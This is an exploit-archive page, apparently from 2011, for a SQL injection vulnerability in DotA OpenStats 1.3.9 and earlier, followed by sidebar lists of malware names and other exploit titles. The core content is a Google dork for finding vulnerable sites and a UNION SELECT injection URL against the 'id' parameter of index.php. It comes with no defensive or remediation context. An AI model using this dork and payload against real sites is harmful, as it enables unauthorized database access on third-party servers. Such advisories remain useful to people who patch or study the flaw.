DotA OpenStats 1.3.9 SQL Injection

Posted on 19 December 2011

=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============

[~] Exploit

 http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

============
Made IN INDONESIA
Greetz for All HVM crew :)
============

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

SOPlanning 1.52.00 Cross Site Scripting
SOPlanning 1.52.00 Cross Site Request Forgery
SOPlanning 1.52.00 SQL Injection
htmlLawed 1.2.5 Remote Command Execution
Online Tours And Travels Management System 1.0 SQL Injection

Last 20